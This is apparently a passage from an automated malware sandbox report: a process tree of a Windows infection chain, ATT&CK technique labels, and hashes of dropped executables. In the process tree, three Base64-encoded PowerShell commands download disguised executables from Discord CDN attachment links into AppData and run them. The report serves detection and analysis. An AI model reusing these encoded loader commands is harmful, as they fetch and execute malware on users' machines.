        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHAAdgBuACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADAAMAA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGQAbgAuAGQAaQBzAGMAbwByAGQAYQBwAHAALgBjAG8AbQAvAGEAdAB0AGEAYwBoAG0AZQBuAHQAcwAvADEAMAA1ADEAOQAzADMAMwA1ADgANQAxADIANAAyADIAOQA5ADIALwAxADAANQAxADkAMwA4ADAANwA0ADQAMQA1ADgANgAxADgAMQAwAC8AVwBpAG4AZABvAHcAcwBEAGUAZgBlAG4AZABlAHIAUwBtAGEAcgB0AHQAUwBjAHIAZQBlAG4ALgBlAHgAZQAnACwAIAA8ACMAZgBjAGgAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBhAGEAeQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBjAGIAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBhAGEAcwBkAGQAZgBzAGEALgBlAHgAZQAnACkAKQA8ACMAYwBoAGwAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAdgBkAHoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHMAbABmACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAGEAYQBzAGQAZABmAHMAYQAuAGUAeABlACcAKQA8ACMAbQBzAHcAIwA+AA=="
        8⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1652
        
        C:\Users\Admin\AppData\Roaming\aasddfsa.exe
        
        "C:\Users\Admin\AppData\Roaming\aasddfsa.exe"
        9⤵
        Executes dropped EXE
        
        PID:2216
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2216 -s 804
        10⤵
        Program crash
        
        PID:2180
      - C:\Windows\system32\cmd.exe
        
        "cmd" /C C:\Users\Admin\AppData\Local\Temp\UIucsqmCiI.exe
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:1460
        
        C:\Users\Admin\AppData\Local\Temp\UIucsqmCiI.exe
        
        C:\Users\Admin\AppData\Local\Temp\UIucsqmCiI.exe
        7⤵
        Executes dropped EXE
        Checks computer location settings
        Suspicious use of WriteProcessMemory
        
        PID:3620
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAcQB1ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADIANQA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGQAbgAuAGQAaQBzAGMAbwByAGQAYQBwAHAALgBjAG8AbQAvAGEAdAB0AGEAYwBoAG0AZQBuAHQAcwAvADEAMAA1ADEAOQAzADMAMwA1ADgANQAxADIANAAyADIAOQA5ADIALwAxADAANQAxADkAMwA4ADEAMAAyADAANgAwADUAMQA1ADQAMgA4AC8AVwBpAG4AZABvAHcAcwBEAGUAZgBlAG4AZABlAHIAUwBtAGEAcgB0AHQAUwBjAHIAZQBlAG4ALgBlAHgAZQAnACwAIAA8ACMAbgBrAHUAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBmAHAAYgAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBiAHIAcAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBhAGEAcwAxAGQAZABmAHMAYQAuAGUAeABlACcAKQApADwAIwB6AHAAdAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBtAHEAdwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAeABrAHgAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAYQBhAHMAMQBkAGQAZgBzAGEALgBlAHgAZQAnACkAPAAjAHEAdwB5ACMAPgA="
        8⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3616
        
        C:\Users\Admin\AppData\Roaming\aas1ddfsa.exe
        
        "C:\Users\Admin\AppData\Roaming\aas1ddfsa.exe"
        9⤵
        Executes dropped EXE
        Adds Run key to start application
        
        PID:4344
      - C:\Windows\system32\cmd.exe
        
        "cmd" /C C:\Users\Admin\AppData\Local\Temp\ryGyA34HDf.exe
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:4036
        
        C:\Users\Admin\AppData\Local\Temp\ryGyA34HDf.exe
        
        C:\Users\Admin\AppData\Local\Temp\ryGyA34HDf.exe
        7⤵
        Executes dropped EXE
        Checks computer location settings
        Suspicious use of WriteProcessMemory
        
        PID:4836
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAcwBrACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADUAMAA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGQAbgAuAGQAaQBzAGMAbwByAGQAYQBwAHAALgBjAG8AbQAvAGEAdAB0AGEAYwBoAG0AZQBuAHQAcwAvADEAMAA1ADEAOQAzADMAMwA1ADgANQAxADIANAAyADIAOQA5ADIALwAxADAANQAxADkAMwA4ADEAMgAyADUANAA5ADcAMAA2ADcANgAyAC8AdwBJAE4AUgBBAFIAXwBwAHIAbwB0AGUAYwB0AGUAZAAuAGUAeABlACcALAAgADwAIwBoAHIAdAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHEAagBnACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGoAcgB4ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAGEAYQAxADEAcwAxAGQAZABmAHMAYQAuAGUAeABlACcAKQApADwAIwBtAHYAYgAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwByAHYAcQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAYwBzAHkAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAYQBhADEAMQBzADEAZABkAGYAcwBhAC4AZQB4AGUAJwApADwAIwBlAGwAagAjAD4A"
        8⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:436

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:1160

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 2216 -ip 2216
1⤵
PID:4756

C:\Users\Admin\AppData\Roaming\2133.exe
C:\Users\Admin\AppData\Roaming\2133.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:440
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
  2⤵
  PID:2316

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
556084f2c6d459c116a69d6fedcc4105

SHA1
633e89b9a1e77942d822d14de6708430a3944dbc

SHA256
88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

SHA512
0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\2133.exe.log

Filesize
902B

MD5
317ed182314a105b8436cfd8bb3879f6

SHA1
aa407b44619a9b06b18d8a39ce27a65b959598e1

SHA256
34a156e5235a27901293bd8928b37d13724d62183e409f6d284110280c56f865

SHA512
27bc617005ef36be6384484e5cec56d7165d1e9535c9a0b5546f1f082cc4bf5969acb573da77171ac7f4119c8cf50a3ced103cd21485569c9cfcf2e340468604

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegAsm.exe.log

Filesize
425B

MD5
4eaca4566b22b01cd3bc115b9b0b2196

SHA1
e743e0792c19f71740416e7b3c061d9f1336bf94

SHA256
34ba0ab8d1850e7825763f413142a333ccbc05fa2b5499a28a7d27b8a1c5b4bb

SHA512
bc2b1bf45203e3bb3009a7d37617b8f0f7ffa613680b32de2b963e39d2cf1650614d7035a0cf78f35a4f5cb17a2a439e2e07deaefd2a4275a62efd0a5c0184a1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
9faf6f9cd1992cdebfd8e34b48ea9330

SHA1
ae792d2551c6b4ad5f3fa5585c0b0d911c9f868e

SHA256
0c45700b2e83b229e25383569b85ddc0107450c43443a11633b53daf1aaed953

SHA512
05b34627f348b2973455691bcb7131e4a5236cfece653d22432746ccd14d211b9b279f0913fbd7bb150f00eb2f2c872f4f5518f3903e024699fd23c50d679e97

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
33e9dd1bc41e70c4fbdf04b85cf36ff4

SHA1
0433625fae735abc2f11249456e212dfca1473a9

SHA256
f11191abae782730f3e16400aef46c9e8404c2608dc132ec646b41e7f07911f9

SHA512
d74083d2f0e7fe21db55c7c0bc880dd2d1fe92ca806c79f77ec0bbc7d2ae5fd1d3509d2ebd0fa60efbab0688711902b7a1da6419aba94a0897810ccf6d9957df

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
33e9dd1bc41e70c4fbdf04b85cf36ff4

SHA1
0433625fae735abc2f11249456e212dfca1473a9

SHA256
f11191abae782730f3e16400aef46c9e8404c2608dc132ec646b41e7f07911f9

SHA512
d74083d2f0e7fe21db55c7c0bc880dd2d1fe92ca806c79f77ec0bbc7d2ae5fd1d3509d2ebd0fa60efbab0688711902b7a1da6419aba94a0897810ccf6d9957df

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
33e9dd1bc41e70c4fbdf04b85cf36ff4

SHA1
0433625fae735abc2f11249456e212dfca1473a9

SHA256
f11191abae782730f3e16400aef46c9e8404c2608dc132ec646b41e7f07911f9

SHA512
d74083d2f0e7fe21db55c7c0bc880dd2d1fe92ca806c79f77ec0bbc7d2ae5fd1d3509d2ebd0fa60efbab0688711902b7a1da6419aba94a0897810ccf6d9957df

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
6b33cff2c64571ee8b1cf14f157f317f

SHA1
ae4426839f5e8c28e8ac6d09b5499d1deda33fd2

SHA256
0381f2b66fae947afa407755ca58105879f85411d9a78b99774059f982ee3619

SHA512
61110504890848c0f2cff028a9f726445d5d63221bade9d3e801527483d29f9730051b10bdd5fa4b454cb40af130989c1aca3a123b5fe7ae665f3ee18c4fa2c2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
6b33cff2c64571ee8b1cf14f157f317f

SHA1
ae4426839f5e8c28e8ac6d09b5499d1deda33fd2

SHA256
0381f2b66fae947afa407755ca58105879f85411d9a78b99774059f982ee3619

SHA512
61110504890848c0f2cff028a9f726445d5d63221bade9d3e801527483d29f9730051b10bdd5fa4b454cb40af130989c1aca3a123b5fe7ae665f3ee18c4fa2c2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
33e9dd1bc41e70c4fbdf04b85cf36ff4

SHA1
0433625fae735abc2f11249456e212dfca1473a9

SHA256
f11191abae782730f3e16400aef46c9e8404c2608dc132ec646b41e7f07911f9

SHA512
d74083d2f0e7fe21db55c7c0bc880dd2d1fe92ca806c79f77ec0bbc7d2ae5fd1d3509d2ebd0fa60efbab0688711902b7a1da6419aba94a0897810ccf6d9957df

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
6b33cff2c64571ee8b1cf14f157f317f

SHA1
ae4426839f5e8c28e8ac6d09b5499d1deda33fd2

SHA256
0381f2b66fae947afa407755ca58105879f85411d9a78b99774059f982ee3619

SHA512
61110504890848c0f2cff028a9f726445d5d63221bade9d3e801527483d29f9730051b10bdd5fa4b454cb40af130989c1aca3a123b5fe7ae665f3ee18c4fa2c2

Download Submit
C:\Users\Admin\AppData\Local\Temp\0.exe

Filesize
537KB

MD5
3849bba366134a2553a6c1f77f2ad17b

SHA1
9bd9c549bbc48239da1fe1bb8da79e563afc98a1

SHA256
1f1c42450a44e9cbd112572924d3ecd8da99c2ed848df0beb0c7c10c60faf85b

SHA512
4d2b8fb3978d55fe99a5068bb9b86a42d1a3a6f78fe006120e4c410adfff91cd2b028d06b852d806faeb01c004a308036902bbe30d3f8ce27fd17cfa10a6cdaf

Download Submit
C:\Users\Admin\AppData\Local\Temp\0.exe

Filesize
537KB

MD5
3849bba366134a2553a6c1f77f2ad17b

SHA1
9bd9c549bbc48239da1fe1bb8da79e563afc98a1

SHA256
1f1c42450a44e9cbd112572924d3ecd8da99c2ed848df0beb0c7c10c60faf85b

SHA512
4d2b8fb3978d55fe99a5068bb9b86a42d1a3a6f78fe006120e4c410adfff91cd2b028d06b852d806faeb01c004a308036902bbe30d3f8ce27fd17cfa10a6cdaf

Download Submit
C:\Users\Admin\AppData\Local\Temp\2C1xlgOnY7.exe

Filesize
6KB

MD5
cb577d6fe5f956799ab1bad83468f083

SHA1
f9fc831f0e5171d3cf7b90e42c3f22e05db60de9

SHA256
e876dfd1ca13d42b65dcad19896f3e8fd077bea1934ce044e9dd9551f0b37142

SHA512
a519c78f49bec05f0a472832e26c65cf9ed4130593a419742541521dae0bc3ff40bbe20ea62ad419049394e036b8189a13af153e32050feab5fd85bc4fc044dc

Download Submit
C:\Users\Admin\AppData\Local\Temp\2C1xlgOnY7.exe

Filesize
6KB

MD5
cb577d6fe5f956799ab1bad83468f083

SHA1
f9fc831f0e5171d3cf7b90e42c3f22e05db60de9

SHA256
e876dfd1ca13d42b65dcad19896f3e8fd077bea1934ce044e9dd9551f0b37142

SHA512
a519c78f49bec05f0a472832e26c65cf9ed4130593a419742541521dae0bc3ff40bbe20ea62ad419049394e036b8189a13af153e32050feab5fd85bc4fc044dc

Download Submit
C:\Users\Admin\AppData\Local\Temp\EXOfZnk0wP.exe

Filesize
5KB

MD5
f378a3e9b0e9cae2fa498cc0514a723c

SHA1
bda8cdf014a5e968058c77d51c7975e0d2047426

SHA256
f4e62c9ffaea29b53ba4b3ffe83071b8982489c9d39d4f50f59accc8d8117e23

SHA512
3921f341a35964d47da5578d42774169017b881a905c16bc42bd30b98f5769fd6160789c4ab7d523fef35491930be1c85a1a394c5a4cf64ff59c930b359a31ce

Download Submit
C:\Users\Admin\AppData\Local\Temp\EXOfZnk0wP.exe

Filesize
5KB

MD5
f378a3e9b0e9cae2fa498cc0514a723c

SHA1
bda8cdf014a5e968058c77d51c7975e0d2047426

SHA256
f4e62c9ffaea29b53ba4b3ffe83071b8982489c9d39d4f50f59accc8d8117e23

SHA512
3921f341a35964d47da5578d42774169017b881a905c16bc42bd30b98f5769fd6160789c4ab7d523fef35491930be1c85a1a394c5a4cf64ff59c930b359a31ce

Download Submit
C:\Users\Admin\AppData\Local\Temp\Sgb0cwt2cl.exe

Filesize
5KB

MD5
58c13bd65aa29d55ccfec3f7e8e99cb3

SHA1
5c94100d9bee5d05eaf7cf432a2d9e7b96f445a3

SHA256
e375c0cbd38fe247cc6903e55156098dbbf577392ca708788e0d7a3fcba2c704

SHA512
094bbe7dedc9dfa3284da9fb4c1f2d880b6efabbbab4a4f916c08f30b283cadc7f81ff60c5901089d099d059a48df8ba3a6ffefa0b32c7dd6bdbd19bbde7b5b9

Download Submit
C:\Users\Admin\AppData\Local\Temp\Sgb0cwt2cl.exe

Filesize
5KB

MD5
58c13bd65aa29d55ccfec3f7e8e99cb3

SHA1
5c94100d9bee5d05eaf7cf432a2d9e7b96f445a3

SHA256
e375c0cbd38fe247cc6903e55156098dbbf577392ca708788e0d7a3fcba2c704

SHA512
094bbe7dedc9dfa3284da9fb4c1f2d880b6efabbbab4a4f916c08f30b283cadc7f81ff60c5901089d099d059a48df8ba3a6ffefa0b32c7dd6bdbd19bbde7b5b9

Download Submit
C:\Users\Admin\AppData\Local\Temp\UIucsqmCiI.exe

Filesize
6KB

MD5
f3fd315aaf2c1b97a2e1544e0690bd98

SHA1
bfd46bae2e0d27cd480156d5eed9fae6aa89e0cf

SHA256
9860d052bfa11ccd500d2e6b53d5f236ad2e77738cf679d1445500b7fcf478b7

SHA512
aba0442d2156311c6e60f5e4094cba3be229e6e7633992e9d800ea507941c474fdad873f4728b8e2e36554a2d969925e4cd7b22daac5c29698c2138c6d39bcc8

Download Submit
C:\Users\Admin\AppData\Local\Temp\UIucsqmCiI.exe

Filesize
6KB

MD5
f3fd315aaf2c1b97a2e1544e0690bd98

SHA1
bfd46bae2e0d27cd480156d5eed9fae6aa89e0cf

SHA256
9860d052bfa11ccd500d2e6b53d5f236ad2e77738cf679d1445500b7fcf478b7

SHA512
aba0442d2156311c6e60f5e4094cba3be229e6e7633992e9d800ea507941c474fdad873f4728b8e2e36554a2d969925e4cd7b22daac5c29698c2138c6d39bcc8

Download Submit
C:\Users\Admin\AppData\Local\Temp\nZrtLgIkmg.exe

Filesize
6KB

MD5
ec6dac5f9a2a3140212b1c39b338107c

SHA1
b29e2b061afd241d48e5d6087b2b757046550ff3

SHA256
66efb80bd8330427fb0d1fcb226bcb60947ab7a8e26f52269323ccb43a9c72c0

SHA512
10a12e4ccf68c61f2b42ffd5591e5cc7d62d25eb3d5a7ea24b6cf47a4bd057db147e6680feb0b32a35278eb13396fa57ff267f0b4762f9d97a1a24bd17c4e055

Download Submit
C:\Users\Admin\AppData\Local\Temp\nZrtLgIkmg.exe

Filesize
6KB

MD5
ec6dac5f9a2a3140212b1c39b338107c

SHA1
b29e2b061afd241d48e5d6087b2b757046550ff3

SHA256
66efb80bd8330427fb0d1fcb226bcb60947ab7a8e26f52269323ccb43a9c72c0

SHA512
10a12e4ccf68c61f2b42ffd5591e5cc7d62d25eb3d5a7ea24b6cf47a4bd057db147e6680feb0b32a35278eb13396fa57ff267f0b4762f9d97a1a24bd17c4e055

Download Submit
C:\Users\Admin\AppData\Local\Temp\ryGyA34HDf.exe

Filesize
6KB

MD5
ccd8796070b10ebf3076f20b38dfb555

SHA1
7f301483b45add8def06c6710218ff52bcce7f26

SHA256
1eb61f1f6e98c4957299f9c608630aef50ca2420bb46cf80b5b0f50e5da77fc6

SHA512
b48c6ab9dd48b45153000e4a6f91f1f84cfa72c052cf737332c2fb5fa26b3a20557021cefa065d53f0d15274da3baed25f2b8b2f873190f5eeb7c84ccde87e16

Download Submit
C:\Users\Admin\AppData\Local\Temp\ryGyA34HDf.exe

Filesize
6KB

MD5
ccd8796070b10ebf3076f20b38dfb555

SHA1
7f301483b45add8def06c6710218ff52bcce7f26

SHA256
1eb61f1f6e98c4957299f9c608630aef50ca2420bb46cf80b5b0f50e5da77fc6

SHA512
b48c6ab9dd48b45153000e4a6f91f1f84cfa72c052cf737332c2fb5fa26b3a20557021cefa065d53f0d15274da3baed25f2b8b2f873190f5eeb7c84ccde87e16

Download Submit
C:\Users\Admin\AppData\Local\Temp\zujtFLcRM6.exe

Filesize
6KB

MD5
6475c77020012b9f8a1743780a27d94c

SHA1
b017cf1f2067f48eed4e0abb9785d475584726ca

SHA256
3b395930f2fd815d01b8b13b54c9fdbd60ed7f56adb4ac93fde78dc0baadf69f

SHA512
dfd9dd5c0698080d127c5cfddc73aa2533901fc5ebb7a01656b40e37e34b696d6cefef512782819983117954d444a6966de9e67518d2235692b0a06121b42cfc

Download Submit
C:\Users\Admin\AppData\Local\Temp\zujtFLcRM6.exe

Filesize
6KB

MD5
6475c77020012b9f8a1743780a27d94c

SHA1
b017cf1f2067f48eed4e0abb9785d475584726ca

SHA256
3b395930f2fd815d01b8b13b54c9fdbd60ed7f56adb4ac93fde78dc0baadf69f

SHA512
dfd9dd5c0698080d127c5cfddc73aa2533901fc5ebb7a01656b40e37e34b696d6cefef512782819983117954d444a6966de9e67518d2235692b0a06121b42cfc

Download Submit
C:\Users\Admin\AppData\Roaming\2131112123.exe

Filesize
87KB

MD5
ca699117112a173ca7b289f1baf6c3c0

SHA1
862f227d4fa0b4de892006d7fe19e610e9f1a676

SHA256
db805d5ac09ea9d18a3016d4c70cbb52087604fe5ad23fd8043399c970c0c8a6

SHA512
d9f82f6e18ce2eb624a5ee1e20618318fde7ffdcff834d9c0291f4971bd72ce9b7f5108bf45f11ceed4d1f526bad4842913e833a25e3d99a3235d6f87b4d2620

Download Submit
C:\Users\Admin\AppData\Roaming\2131112123.exe

Filesize
87KB

MD5
ca699117112a173ca7b289f1baf6c3c0

SHA1
862f227d4fa0b4de892006d7fe19e610e9f1a676

SHA256
db805d5ac09ea9d18a3016d4c70cbb52087604fe5ad23fd8043399c970c0c8a6

SHA512
d9f82f6e18ce2eb624a5ee1e20618318fde7ffdcff834d9c0291f4971bd72ce9b7f5108bf45f11ceed4d1f526bad4842913e833a25e3d99a3235d6f87b4d2620

Download Submit
C:\Users\Admin\AppData\Roaming\21311123.exe

Filesize
14.7MB

MD5
6f6b812c166e53dc9b52b9b60e5ed369

SHA1
e60cf5e718c030182dec6f7fbbbbf884fcdfcca1

SHA256
ffead35df6bc101476d76393619fe0a06a57d93927417d9bcf814d2e4c6b36a0

SHA512
8e8e5fe21f4b08a053255beb0f4e55f03e0114e7fa2117b8ef8320e7fd88275771394cd9a7e4237793b370f980ff7ed45a6ff78d3d97d59cd077868e7602f4b9

Download Submit
C:\Users\Admin\AppData\Roaming\21311123.exe

Filesize
14.7MB

MD5
6f6b812c166e53dc9b52b9b60e5ed369

SHA1
e60cf5e718c030182dec6f7fbbbbf884fcdfcca1

SHA256
ffead35df6bc101476d76393619fe0a06a57d93927417d9bcf814d2e4c6b36a0

SHA512
8e8e5fe21f4b08a053255beb0f4e55f03e0114e7fa2117b8ef8320e7fd88275771394cd9a7e4237793b370f980ff7ed45a6ff78d3d97d59cd077868e7602f4b9

Download Submit
C:\Users\Admin\AppData\Roaming\213123.exe

Filesize
87KB

MD5
3c6ccbfe897915f0fe6bc34d193bf4a0

SHA1
6fe3161ee66e317889066a302474e511220939e7

SHA256
52bf11364e8430f4b271ebb29e2a55451543338be5b2a34e731ede58eef04241

SHA512
e0bf1fc11deacb24b5d5de4bcfc522057d1ca1b4866325356b2c9a1f009c6562eee0c0e602478b3639de4beff14997d59a3b428281d9111278544fc5e3199536

Download Submit
C:\Users\Admin\AppData\Roaming\213123.exe

Filesize
87KB

MD5
3c6ccbfe897915f0fe6bc34d193bf4a0

SHA1
6fe3161ee66e317889066a302474e511220939e7

SHA256
52bf11364e8430f4b271ebb29e2a55451543338be5b2a34e731ede58eef04241

SHA512
e0bf1fc11deacb24b5d5de4bcfc522057d1ca1b4866325356b2c9a1f009c6562eee0c0e602478b3639de4beff14997d59a3b428281d9111278544fc5e3199536

Download Submit
C:\Users\Admin\AppData\Roaming\2133.exe

Filesize
14.7MB

MD5
2cbd5d9d43c5c49f0580975e9e620808

SHA1
17e209b6d6c66882ed78a40d7e0d211760b489a0

SHA256
399a0e77326dc484fa92fd5f95f2dbd89866dfd4e7e80661634a9a83f0652403

SHA512
26e06d3d3b4f8d1198f483e2485ee107782c7f5b70ddb4d48dd84c9ef81029af316ad3a184c90921c6f1188f92d88b9fd6a152eaba5648a03bfbdea589202812

Download Submit
C:\Users\Admin\AppData\Roaming\2133.exe

Filesize
14.7MB

MD5
2cbd5d9d43c5c49f0580975e9e620808

SHA1
17e209b6d6c66882ed78a40d7e0d211760b489a0

SHA256
399a0e77326dc484fa92fd5f95f2dbd89866dfd4e7e80661634a9a83f0652403

SHA512
26e06d3d3b4f8d1198f483e2485ee107782c7f5b70ddb4d48dd84c9ef81029af316ad3a184c90921c6f1188f92d88b9fd6a152eaba5648a03bfbdea589202812

Download Submit
C:\Users\Admin\AppData\Roaming\2133.exe

Filesize
14.7MB

MD5
2cbd5d9d43c5c49f0580975e9e620808

SHA1
17e209b6d6c66882ed78a40d7e0d211760b489a0

SHA256
399a0e77326dc484fa92fd5f95f2dbd89866dfd4e7e80661634a9a83f0652403

SHA512
26e06d3d3b4f8d1198f483e2485ee107782c7f5b70ddb4d48dd84c9ef81029af316ad3a184c90921c6f1188f92d88b9fd6a152eaba5648a03bfbdea589202812

Download Submit
C:\Users\Admin\AppData\Roaming\DEFENDERFILESECURITY.EXE

Filesize
532KB

MD5
84e6aa267c6970d2d777d60840390102

SHA1
c97e555e98c5bec69bcad9607cf0153ff827a141

SHA256
69f7c84e27083e5af30a91c797c6c1d5b694c2926ebb8a9edb7c6ed8e4c3cb3c

SHA512
47184ca58f7358bad24acbcfc2038a510a1ae55b90b927d79a98df13c0e911daeaadb1100f0dc112370fe61bf6264fb9ff214d143d17af659e0bd1ba16f0cecc

Download Submit
C:\Users\Admin\AppData\Roaming\DEFENDERFILESECURITY.EXE

Filesize
532KB

MD5
84e6aa267c6970d2d777d60840390102

SHA1
c97e555e98c5bec69bcad9607cf0153ff827a141

SHA256
69f7c84e27083e5af30a91c797c6c1d5b694c2926ebb8a9edb7c6ed8e4c3cb3c

SHA512
47184ca58f7358bad24acbcfc2038a510a1ae55b90b927d79a98df13c0e911daeaadb1100f0dc112370fe61bf6264fb9ff214d143d17af659e0bd1ba16f0cecc

Download Submit
C:\Users\Admin\AppData\Roaming\aas1ddfsa.exe

Filesize
4.2MB

MD5
b60e44033994d1fde9a4b6f1338bfa04

SHA1
7f2cd8091276040ca011174269112099ec3e9bef

SHA256
baaa098832eb5790a1fabfdc6284eecffdd74a914ea1312c0f413cc5bb814a7e

SHA512
a8776d7ce2bffa25cefe789bf8f5a4b5b0b81ef53cd0c783ded1be9ee0f976c6c2a3bd41a4d9c05eb15910051d3cfe490c6390b7029d370ad71487c88416c574

Download Submit
C:\Users\Admin\AppData\Roaming\aas1ddfsa.exe

Filesize
4.2MB

MD5
b60e44033994d1fde9a4b6f1338bfa04

SHA1
7f2cd8091276040ca011174269112099ec3e9bef

SHA256
baaa098832eb5790a1fabfdc6284eecffdd74a914ea1312c0f413cc5bb814a7e

SHA512
a8776d7ce2bffa25cefe789bf8f5a4b5b0b81ef53cd0c783ded1be9ee0f976c6c2a3bd41a4d9c05eb15910051d3cfe490c6390b7029d370ad71487c88416c574

Download Submit
C:\Users\Admin\AppData\Roaming\aasddfsa.exe

Filesize
1006KB

MD5
f87fd290c2d08ede25d6a8def9657c07

SHA1
930e7f35e0d5a43faf19ad75bc41c7efce914a17

SHA256
a9b2a465ca8b372a9067d8cc4f6ce6404e2501177f5499d343ca88c0bc4665cf

SHA512
0093b13ab44468c67aceadb04d4cdbbb7486737e8aa0a6aff8e662c308100a6d3bdf4f1cdc630e00d701fa8ec79ed89a8d31ed325bf2c6f05797742aae09db07

Download Submit
C:\Users\Admin\AppData\Roaming\aasddfsa.exe

Filesize
1006KB

MD5
f87fd290c2d08ede25d6a8def9657c07

SHA1
930e7f35e0d5a43faf19ad75bc41c7efce914a17

SHA256
a9b2a465ca8b372a9067d8cc4f6ce6404e2501177f5499d343ca88c0bc4665cf

SHA512
